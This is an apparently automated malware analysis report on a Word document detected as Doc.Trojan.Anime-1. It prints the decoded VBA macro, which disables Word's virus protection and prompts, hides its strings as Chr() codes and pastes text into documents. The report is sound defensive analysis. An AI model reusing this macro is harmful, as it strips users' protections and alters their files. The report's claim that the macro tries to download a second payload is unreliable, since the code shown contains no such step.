Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf2d1fb2bb73c7a7…

MALICIOUS

Office (OLE)

32.5 KB Created: 2000-02-25 03:01:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 90e906631af3042c5fd3024d8b1a61cf SHA-1: 37d82673cd308f07c8b2d6fa1ea9f721d8d13489 SHA-256: bf2d1fb2bb73c7a735f30a92f115c7bba789c7fe821941e32b4f87a70a6e0d1a
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Anime-1. It contains VBA macros that execute upon opening. The macro code appears to be obfuscated, but it manipulates the application's status bar and clipboard, suggesting an attempt to download and execute a secondary payload. The presence of VBA macros strongly indicates a spearphishing attachment delivery vector.

Heuristics 2

  • ClamAV: Doc.Trojan.Anime-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Anime-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1656 bytes
SHA-256: aef79b1150bf688dba14581dd2678723bf0542ea355183d2ae770491fbbb2035
Detection
ClamAV: Doc.Trojan.Anime-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub anime()

Options.ConfirmConversions = (2 - 2): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1): Application.DisplayRecentFiles = (10 - 10)

Set cb = New DataObject
oi = Chr(32)
Application.EnableCancelKey = wdCancelDisabled
S = Chr(86) + Chr(105) + Chr(99) + Chr(111) + Chr(100) + Chr(105) + Chr(110) + Chr(69) + Chr(83) + oi + oi
Application.Caption = oi + oi + S + Chr(47) + Chr(84) + Chr(78) + Chr(78) + oi + Chr(47) + Chr(67) + Chr(66) + oi + oi
For an = 1 To 3
For x = 1 To 15
yy = S + yy
Application.StatusBar = yy
Call Delay
Next x
For t = 1 To 12
yy = S + vbTab + yy
Application.StatusBar = yy
Call Delay
Next t
For u = 1 To 10
yy = vbTab + S + vbTab + yy
Application.StatusBar = yy
Call Delay
Next u
Next an
yy = S + oi + Chr(45) + Chr(45) + Chr(45) + Chr(62) + oi + yy
For i = 1 To 115
yy = oi + yy
Application.StatusBar = yy
For o = 1 To 400000
Next o
Next i
Application.StatusBar = Chr(62) + Chr(58) + Chr(45) + Chr(41) + yy
Application.Caption = Application.Application & oi & Chr(76) & Chr(111) & Chr(118) & Chr(101) & Chr(115) & oi & Application.UserName
cb.SetText cr & Application.Application & oi & Chr(76) & Chr(111) & Chr(118) & Chr(101) & Chr(115) & oi & Application.UserName & cr & cr
cb.PutInClipboard
Selection.Paste
End Sub
Function Delay()
For o = 1 To 1000000
Next o
End Function